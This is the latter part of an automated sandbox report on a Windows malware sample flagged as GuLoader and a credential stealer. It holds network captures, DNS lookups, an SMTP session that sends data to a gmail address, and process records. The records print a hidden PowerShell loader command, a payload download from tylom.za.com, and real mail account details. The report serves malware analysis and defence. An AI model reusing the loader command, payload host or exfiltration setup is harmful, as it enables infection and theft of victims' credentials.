                                                                                    Mar 7, 2025 16:34:21.082324028 CET58749722185.153.221.224192.168.2.4
                                                                                    Mar 7, 2025 16:34:21.539076090 CET58749722185.153.221.224192.168.2.4
                                                                                    Mar 7, 2025 16:34:21.539299965 CET49722587192.168.2.4185.153.221.224
                                                                                    Mar 7, 2025 16:34:21.545393944 CET58749722185.153.221.224192.168.2.4
                                                                                    Mar 7, 2025 16:34:21.777796984 CET58749722185.153.221.224192.168.2.4
                                                                                    Mar 7, 2025 16:34:21.779098034 CET49722587192.168.2.4185.153.221.224
                                                                                    Mar 7, 2025 16:34:21.779170990 CET49722587192.168.2.4185.153.221.224
                                                                                    Mar 7, 2025 16:34:21.779181957 CET49722587192.168.2.4185.153.221.224
                                                                                    Mar 7, 2025 16:34:21.779191017 CET49722587192.168.2.4185.153.221.224
                                                                                    Mar 7, 2025 16:34:21.784245968 CET58749722185.153.221.224192.168.2.4
                                                                                    Mar 7, 2025 16:34:21.784260035 CET58749722185.153.221.224192.168.2.4
                                                                                    Mar 7, 2025 16:34:21.784343004 CET58749722185.153.221.224192.168.2.4
                                                                                    Mar 7, 2025 16:34:21.784353018 CET58749722185.153.221.224192.168.2.4
                                                                                    Mar 7, 2025 16:34:31.587925911 CET58749722185.153.221.224192.168.2.4
                                                                                    Mar 7, 2025 16:34:31.636647940 CET49722587192.168.2.4185.153.221.224
                                                                                    Mar 7, 2025 16:35:05.793380022 CET4972080192.168.2.4193.122.130.0
                                                                                    Mar 7, 2025 16:35:05.798681974 CET8049720193.122.130.0192.168.2.4
                                                                                    Mar 7, 2025 16:35:05.798825979 CET4972080192.168.2.4193.122.130.0

                                                                                    UDP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Mar 7, 2025 16:34:05.270638943 CET5129253192.168.2.41.1.1.1
                                                                                    Mar 7, 2025 16:34:05.301517010 CET53512921.1.1.1192.168.2.4
                                                                                    Mar 7, 2025 16:34:07.213064909 CET5444653192.168.2.41.1.1.1
                                                                                    Mar 7, 2025 16:34:07.220530033 CET53544461.1.1.1192.168.2.4
                                                                                    Mar 7, 2025 16:34:07.852817059 CET5089953192.168.2.41.1.1.1
                                                                                    Mar 7, 2025 16:34:07.862178087 CET53508991.1.1.1192.168.2.4
                                                                                    Mar 7, 2025 16:34:15.785326958 CET5630453192.168.2.41.1.1.1
                                                                                    Mar 7, 2025 16:34:16.127995014 CET53563041.1.1.1192.168.2.4

                                                                                    DNS Queries

                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Mar 7, 2025 16:34:05.270638943 CET192.168.2.41.1.1.10x8ccbStandard query (0)tylom.za.comA (IP address)IN (0x0001)false
                                                                                    Mar 7, 2025 16:34:07.213064909 CET192.168.2.41.1.1.10xa3e3Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                    Mar 7, 2025 16:34:07.852817059 CET192.168.2.41.1.1.10xa219Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                    Mar 7, 2025 16:34:15.785326958 CET192.168.2.41.1.1.10x87c9Standard query (0)mail.vernazzasuites.comA (IP address)IN (0x0001)false

                                                                                    DNS Answers

                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Mar 7, 2025 16:34:05.301517010 CET1.1.1.1192.168.2.40x8ccbNo error (0)tylom.za.com172.93.120.241A (IP address)IN (0x0001)false
                                                                                    Mar 7, 2025 16:34:07.220530033 CET1.1.1.1192.168.2.40xa3e3No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                    Mar 7, 2025 16:34:07.220530033 CET1.1.1.1192.168.2.40xa3e3No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                    Mar 7, 2025 16:34:07.220530033 CET1.1.1.1192.168.2.40xa3e3No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                    Mar 7, 2025 16:34:07.220530033 CET1.1.1.1192.168.2.40xa3e3No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                    Mar 7, 2025 16:34:07.220530033 CET1.1.1.1192.168.2.40xa3e3No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                    Mar 7, 2025 16:34:07.220530033 CET1.1.1.1192.168.2.40xa3e3No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                    Mar 7, 2025 16:34:07.862178087 CET1.1.1.1192.168.2.40xa219No error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                    Mar 7, 2025 16:34:07.862178087 CET1.1.1.1192.168.2.40xa219No error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                    Mar 7, 2025 16:34:07.862178087 CET1.1.1.1192.168.2.40xa219No error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                    Mar 7, 2025 16:34:07.862178087 CET1.1.1.1192.168.2.40xa219No error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                    Mar 7, 2025 16:34:07.862178087 CET1.1.1.1192.168.2.40xa219No error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                    Mar 7, 2025 16:34:07.862178087 CET1.1.1.1192.168.2.40xa219No error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                    Mar 7, 2025 16:34:07.862178087 CET1.1.1.1192.168.2.40xa219No error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                    Mar 7, 2025 16:34:16.127995014 CET1.1.1.1192.168.2.40x87c9No error (0)mail.vernazzasuites.comvernazzasuites.comCNAME (Canonical name)IN (0x0001)false
                                                                                    Mar 7, 2025 16:34:16.127995014 CET1.1.1.1192.168.2.40x87c9No error (0)vernazzasuites.com185.153.221.224A (IP address)IN (0x0001)false

                                                                                    HTTP Request Dependency Graph

                                                                                    • reallyfreegeoip.org
                                                                                    • tylom.za.com
                                                                                    • checkip.dyndns.org

                                                                                    HTTP Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.449719172.93.120.241801080C:\Windows\SysWOW64\msiexec.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 7, 2025 16:34:05.315119982 CET165OUTGET /esto.bin HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                                    Host: tylom.za.com
                                                                                    Cache-Control: no-cache
                                                                                    Mar 7, 2025 16:34:05.986758947 CET1236INHTTP/1.1 200 OK
                                                                                    Date: Fri, 07 Mar 2025 15:34:09 GMT
                                                                                    Server: Apache
                                                                                    Last-Modified: Wed, 26 Feb 2025 03:56:27 GMT
                                                                                    Accept-Ranges: bytes
                                                                                    Content-Length: 93760
                                                                                    Content-Type: application/octet-stream
                                                                                    Data Raw: 35 50 45 5c c6 89 ac 84 b9 c6 97 e7 2f f5 e4 27 bc c7 99 a4 ca 5d 0d 9e 39 d3 83 51 7a 2e 4e 47 53 b2 ac 53 3c da cb 0e 26 e1 8a 41 54 d5 48 67 b7 db 19 ff ac f9 1c 8b 1c 63 8e 1e b0 4e 7d a3 be 68 d5 fb c9 a4 85 25 fa 55 bd fb dc 79 1f b6 e6 ca d3 e8 01 72 92 d3 da a7 8a ba 65 d0 2c be ad 8a f0 1b ec 0a 98 ef a0 e4 1f 77 3a f5 40 fa 08 b0 9b be f6 64 09 d2 4a 70 9d 1b 66 67 fa c5 3d f6 e8 6a 2a e9 05 96 73 4b 11 43 11 d3 9c 4d 12 ad d2 38 ab 71 9c 6e 6b 1d f2 f9 b2 3d 59 fc 0c 67 0f 00 f9 0e 7c 64 1e 30 99 7b b9 f6 cb 2a ec 72 61 7c b2 18 31 cd 45 83 5f ef c7 99 48 20 33 51 96 da 68 ab 70 59 46 54 ba d6 c2 63 2b bd a6 58 9e 01 f2 d0 50 70 df 61 e2 47 7c 00 72 f6 3f 42 df 73 5c 4c 15 fd b6 d6 f7 b1 f2 c1 33 5f 9b 16 1e 8b fa 93 2d 80 2f 4f 99 d3 4f e8 7d 9d d7 a9 95 58 b1 73 52 ef a8 ec a9 58 46 f1 8c 0f bb de 8f c4 9b 15 80 fd b9 17 54 80 97 ee 2b c8 6f b3 98 37 6a b9 13 6c e6 d4 6e 77 7c b8 f4 bc 78 dd c6 f3 b9 a8 81 59 85 ea 33 58 39 03 73 f0 d5 45 57 59 17 35 7d 37 1d 97 84 39 7d ea d3 61 93 58 [TRUNCATED]
                                                                                    Data Ascii: 5PE\/']9Qz.NGSS<&ATHgcN}h%Uyre,w:@dJpfg=j*sKCM8qnk=Yg|d0{*ra|1E_H 3QhpYFTc+XPpaG|r?Bs\L3_-/OO}XsRXFT+o7jlnw|xY3X9sEWY5}79}aX?C`a6@:Cm=<5^OJpphV?R)^-!Bdl^G$\Wo>w~]FCIM$KY]xTG"h't%,s}z}!)RWyRRMaHzO}$bG?zS%q6Nz*zzLx?$pJ\4&0eFrgko}9FqQ#y|()V5Uo3wZP/+;:6@T,9mz8@WQ9lO$8yL,$t_T3LC;}|=q7A7kP@-2{w2#>Y2-7W2lAPOck%&Bug;Woj)dw#T<hN7f#!2Ww+,k4_w!az6HfIY!wwvpT'Wd}Dqe"o@'0O`tZfdXLnol/bDSUxG,4{/W [TRUNCATED]
                                                                                    Mar 7, 2025 16:34:05.986778975 CET224INData Raw: 2d d3 9e 3b 55 f6 d6 bb 0c d3 78 7b 7c ee e2 aa 67 ca ec 63 c2 99 33 34 f2 8f 71 64 d7 4d 95 27 33 5c 61 d8 a7 8f 55 6c 13 27 6b 83 9f 52 2e 3a 32 48 b5 ff 2a 8b 03 58 11 1e 5e 7c 87 7b 26 1a cc 10 c0 6f b8 4f 18 c2 a1 65 b9 24 ef e0 5e 4f 76 1b
                                                                                    Data Ascii: -;Ux{|gc34qdM'3\aUl'kR.:2H*X^|{&oOe$^OvDb;RVfm+g'p6#ged$E'pU<Qu.n}6%I1~?_!O M:ARd9 Nco:P1u3|NDv
                                                                                    Mar 7, 2025 16:34:05.986793041 CET1236INData Raw: 9d 4d 0e d8 28 b8 11 e6 fa 1c 46 6d 0c 3c 01 b7 1d f9 c9 e9 bd 0e 67 29 74 da 2a 78 7f 74 16 51 2e 40 60 0f ed 4e d1 b7 01 61 16 28 67 7f 0b 7f 6e ac 6d c4 ec 60 05 5f bf 8e 38 b9 a0 89 85 eb 91 c9 7f 40 b5 b4 34 9c 4d 81 43 36 42 65 a0 5b cb 4c
                                                                                    Data Ascii: M(Fm<g)t*xtQ.@`Na(gnm`_8@4MC6Be[LWcy<8;_ZPvQ0Z:h,#FwM0Z_>5#T5dSL^FDc?oh1/W:Q]"4yimVc&9t)w8]L\#
                                                                                    Mar 7, 2025 16:34:05.986807108 CET224INData Raw: e2 47 ca a1 c1 df 1d 77 0a 04 d6 37 d2 8c 98 57 78 54 88 47 04 ab b1 22 99 a4 0f 8f e8 cb c6 d6 cf 87 a4 fb f3 bb 0b 29 a6 74 52 c9 ac 2c 2c d3 a5 e2 56 7c 9f c6 05 08 99 83 ad dd d9 ab 11 bb 21 92 88 29 bc 80 85 84 b1 ae aa c9 e5 c8 d9 22 67 10
                                                                                    Data Ascii: Gw7WxTG")tR,,V|!)"gyRMc`dOpV$dG,yQ[gNc*~LxX? stX\&5e57gaA}?mqw#k<u(0zS5OMop|3#_;
                                                                                    Mar 7, 2025 16:34:06.017688990 CET1236INData Raw: 8b 41 20 d4 92 31 36 ae c9 8d c6 22 c2 54 2c a1 65 6b 64 8f 1d fa ca bf 38 44 69 b6 51 b9 a6 8b 60 d6 1c 1c b0 09 49 38 73 a3 2f 2c 92 f6 dd ee 72 5f e4 b9 8b a8 30 1e b3 94 b4 af 9d da d2 33 99 b2 79 7c 45 b2 f7 f0 f0 bb 55 c3 55 8d c2 7c 19 15
                                                                                    Data Ascii: A 16"T,ekd8DiQ`I8s/,r_03y|EUU|sE;m@1{2"^@2-2j2lO-Hcro)o-V7s62+7+DQ'''/bnC>/|r#$}:Lk%
                                                                                    Mar 7, 2025 16:34:06.017716885 CET1236INData Raw: 7b 63 00 63 b1 27 67 d6 c0 b2 a2 e5 47 61 e5 50 b5 0f 01 0f 6c 8b 34 22 4b c6 74 ec e8 5c 22 1a b1 95 2d 8f 76 29 c1 e7 37 1c bf e0 76 ec da 54 11 38 7d a6 16 22 4f 85 be 03 6f 68 82 92 e3 2e a5 22 98 17 85 03 40 1f 27 05 2c fd 14 b3 f7 ad 41 3c
                                                                                    Data Ascii: {cc'gGaPl4"Kt\"-v)7vT8}"Ooh."@',A<9Pi;fyejMvwLmdV9^znDO/@ai\8\0h<}| cvW,q?UQn]\"V]-"<)vat=e
                                                                                    Mar 7, 2025 16:34:06.017724037 CET448INData Raw: 37 15 e0 34 9c 67 af 26 81 ea ef 6f b9 22 c4 c3 11 5e 7e 0b 2b 1d 3a 3b bd 54 a6 e3 54 6a 81 18 0a ff 96 76 d0 85 5c 9b 7d 8f 64 d3 db 3a ed 13 a3 25 91 ef 27 29 ee 27 61 12 54 4e d4 9a f6 b4 29 24 0c cf e5 ad 45 98 26 1b 8b f9 15 07 1d 64 4e e8
                                                                                    Data Ascii: 74g&o"^~+:;TTjv\}d:%')'aTN)$E&dN_6@Y4WwyhC3xM!#0ADYPk`!M'rf>RgN|J^I$7o\%h%b3FQCyulss2?.f4c7+b@BOeiH1
                                                                                    Mar 7, 2025 16:34:06.052556038 CET1236INData Raw: 6d 5b 7c 1f d9 80 62 8a d9 55 7c b3 15 68 21 df c6 72 33 a8 1d 97 b2 c8 2a 12 c9 ae 19 9d 6d 6d eb 46 d0 da 29 bb 90 a7 54 1c 27 fa 8a 37 f1 c6 8e e8 5e 88 5c 53 67 4b 04 25 8c a2 f0 3b 41 e1 2c 3e f3 dd 82 0c e5 e7 b2 aa bb 58 1d 5b 6e cc f6 00
                                                                                    Data Ascii: m[|bU|h!r3*mmF)T'7^\SgK%;A,>X[nom8y5unRy'_;gKd%L"P~TQGZQb}(<52Fp3ovTtf' 4EF{F5I1sfvo)[
                                                                                    Mar 7, 2025 16:34:06.052571058 CET224INData Raw: e5 13 99 b8 0f eb db b2 87 d2 d5 aa 2b de 7d c7 c6 0e af 36 b8 03 8d 38 b6 41 3d fa ae 14 a0 b4 e1 7a ee 76 4c 16 ed f4 54 7c 7b b1 fd 8e f4 19 fd 50 0d 48 f9 da 1e 08 c2 95 05 fa e8 04 4c 05 b7 54 36 9e 3f ea 2f 0e 03 d0 5f 54 45 63 7e 47 7d 09
                                                                                    Data Ascii: +}68A=zvLT|{PHLT6?/_TEc~G}jc~mH)cO%Wy;6sa*_<D#'g#Rk+w#hnKLk6fIm@8[W;n>@ykk7*jp1)
                                                                                    Mar 7, 2025 16:34:06.052592039 CET1236INData Raw: b5 30 17 2a 09 c6 60 7a 80 c5 58 b5 f4 d6 8c a4 57 e5 e6 ed 55 8f 37 37 b9 c5 11 60 02 fc 9f 93 30 ee 79 15 51 09 b9 ae 0a 4b fe 04 20 96 99 64 ce 58 5a bb 2b f3 3b 98 8b 34 b5 e7 03 c4 84 27 a0 97 d0 47 f6 1f 9b f3 42 32 1b 7f ee 7c df 9e 3d 7d
                                                                                    Data Ascii: 0*`zXWU77`0yQK dXZ+;4'GB2|=}|dxdGq=57N>*Rq&*4v{,n5+"c7{4;^Z&d<{_604@IN0)T E}rLU6_,!W}3s6?
                                                                                    Mar 7, 2025 16:34:06.052602053 CET224INData Raw: 81 f2 48 df 71 a5 1c 0a 76 d2 9a d3 53 35 e8 54 47 6d 61 da 78 0c 22 5d 59 f7 5d f7 92 98 0c ab 1d 05 19 87 25 3f c7 4d 82 5f ef d9 99 48 31 63 3c 92 da 24 ac 1c e2 97 3a f8 08 7e 63 2b b7 ad 70 9a 01 12 d6 3d ca d4 60 b8 28 c1 64 73 fc 33 42 f3
                                                                                    Data Ascii: HqvS5TGmax"]Y]%?M_H1c<$:~c+p=`(ds3B|[A-B3Hn+~BjcsC0m3p4dTmA7{OU&mV)8n;(M![Y0:|'9maRMH]k<|@:u10L95B


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192.168.2.449720193.122.130.0801080C:\Windows\SysWOW64\msiexec.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 7, 2025 16:34:07.267654896 CET151OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Connection: Keep-Alive
                                                                                    Mar 7, 2025 16:34:07.739774942 CET321INHTTP/1.1 200 OK
                                                                                    Date: Fri, 07 Mar 2025 15:34:07 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 104
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: 43e882488351f81818f47fece41d753a
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                    Mar 7, 2025 16:34:07.745569944 CET127OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Mar 7, 2025 16:34:07.850308895 CET321INHTTP/1.1 200 OK
                                                                                    Date: Fri, 07 Mar 2025 15:34:07 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 104
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: 2e6a5676d2f3562183ed9e396055dc8c
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                    Mar 7, 2025 16:34:15.660814047 CET127OUTGET / HTTP/1.1
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                    Host: checkip.dyndns.org
                                                                                    Mar 7, 2025 16:34:15.764741898 CET321INHTTP/1.1 200 OK
                                                                                    Date: Fri, 07 Mar 2025 15:34:15 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 104
                                                                                    Connection: keep-alive
                                                                                    Cache-Control: no-cache
                                                                                    Pragma: no-cache
                                                                                    X-Request-ID: eddc318f069aa1c55d93bd6f02127a74
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                    HTTPS Proxied Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.449721104.21.64.14431080C:\Windows\SysWOW64\msiexec.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-03-07 15:34:09 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                    Host: reallyfreegeoip.org
                                                                                    Connection: Keep-Alive
                                                                                    2025-03-07 15:34:09 UTC858INHTTP/1.1 200 OK
                                                                                    Date: Fri, 07 Mar 2025 15:34:09 GMT
                                                                                    Content-Type: text/xml
                                                                                    Content-Length: 362
                                                                                    Connection: close
                                                                                    Age: 24882
                                                                                    Cache-Control: max-age=31536000
                                                                                    cf-cache-status: HIT
                                                                                    last-modified: Fri, 07 Mar 2025 08:39:27 GMT
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e0uQLH0V%2BXss26IiideACRFfteZBkdMnUt3uxUUsm2Esqj7N1pWGAvdvSfb%2B468tN%2BRRkBoHnmUeRHszXJIYatkkzzAqNwJ2jrYkehUNT7ugJfy9NR44WVkeoVrwyRzj%2BfspK4BK"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 91cb27c70c100f4a-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=32069&min_rtt=19782&rtt_var=16594&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=146336&cwnd=233&unsent_bytes=0&cid=7ac19cb358e4ceb3&ts=503&x=0"
                                                                                    2025-03-07 15:34:09 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                    SMTP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IPCommands
                                                                                    Mar 7, 2025 16:34:17.686218977 CET58749722185.153.221.224192.168.2.4220-tr.kurumsalposta.net ESMTP Exim 4.96.2 #2 Fri, 07 Mar 2025 18:34:17 +0300
                                                                                    220- We do not authorize the use of this system to transport unsolicited,
                                                                                    220 and/or bulk e-mail.
                                                                                    Mar 7, 2025 16:34:17.686574936 CET49722587192.168.2.4185.153.221.224EHLO 494126
                                                                                    Mar 7, 2025 16:34:18.721782923 CET58749722185.153.221.224192.168.2.4250-tr.kurumsalposta.net Hello 494126 [8.46.123.189]
                                                                                    250-SIZE 31457280
                                                                                    250-8BITMIME
                                                                                    250-PIPELINING
                                                                                    250-PIPECONNECT
                                                                                    250-AUTH PLAIN LOGIN
                                                                                    250-STARTTLS
                                                                                    250 HELP
                                                                                    Mar 7, 2025 16:34:18.722165108 CET49722587192.168.2.4185.153.221.224AUTH login bXVoYXNlYmVAdmVybmF6emEuY29tLnRy
                                                                                    Mar 7, 2025 16:34:19.359452009 CET58749722185.153.221.224192.168.2.4334 UGFzc3dvcmQ6
                                                                                    Mar 7, 2025 16:34:20.843339920 CET58749722185.153.221.224192.168.2.4235 Authentication succeeded
                                                                                    Mar 7, 2025 16:34:20.843605042 CET49722587192.168.2.4185.153.221.224MAIL FROM:<muhasebe@vernazza.com.tr>
                                                                                    Mar 7, 2025 16:34:21.076908112 CET58749722185.153.221.224192.168.2.4250 OK
                                                                                    Mar 7, 2025 16:34:21.077254057 CET49722587192.168.2.4185.153.221.224RCPT TO:<alex.knoetner@gmail.com>
                                                                                    Mar 7, 2025 16:34:21.539076090 CET58749722185.153.221.224192.168.2.4250 Accepted
                                                                                    Mar 7, 2025 16:34:21.539299965 CET49722587192.168.2.4185.153.221.224DATA
                                                                                    Mar 7, 2025 16:34:21.777796984 CET58749722185.153.221.224192.168.2.4354 Enter message, ending with "." on a line by itself
                                                                                    Mar 7, 2025 16:34:21.779191017 CET49722587192.168.2.4185.153.221.224.
                                                                                    Mar 7, 2025 16:34:31.587925911 CET58749722185.153.221.224192.168.2.4250 OK id=1tqZiS-0009A2-2u

                                                                                    Statistics

                                                                                    CPU Usage

                                                                                    Click to jump to process

                                                                                    Memory Usage

                                                                                    Click to jump to process

                                                                                    High Level Behavior Distribution

                                                                                    Click to dive into process behavior distribution

                                                                                    Behavior

                                                                                    Click to jump to process

                                                                                    System Behavior

                                                                                    General

                                                                                    Target ID:0
                                                                                    Start time:10:32:59
                                                                                    Start date:07/03/2025
                                                                                    Path:C:\Users\user\Desktop\LE2dyDn347.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\LE2dyDn347.exe"
                                                                                    Imagebase:0x400000
                                                                                    File size:663'005 bytes
                                                                                    MD5 hash:B3688B35CEAC51A6461E8C270B959C91
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:1
                                                                                    Start time:10:33:00
                                                                                    Start date:07/03/2025
                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:powershell.exe -windowstyle hidden "$Maatter=GC -raw 'C:\Users\user\AppData\Local\Temp\Knowinger\Augustine191\Finanspolitikkens\Afgiftslov.Pre110';$Unqualifyingly107=$Maatter.SubString(53796,3);.$Unqualifyingly107($Maatter)"
                                                                                    Imagebase:0x400000
                                                                                    File size:433'152 bytes
                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.1777193585.000000000A510000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:2
                                                                                    Start time:10:33:00
                                                                                    Start date:07/03/2025
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff62fc20000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:9
                                                                                    Start time:10:33:52
                                                                                    Start date:07/03/2025
                                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                    Imagebase:0x270000
                                                                                    File size:59'904 bytes
                                                                                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2501273805.0000000023244000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000009.00000002.2501273805.0000000023244000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    Disassembly

                                                                                    Reset < >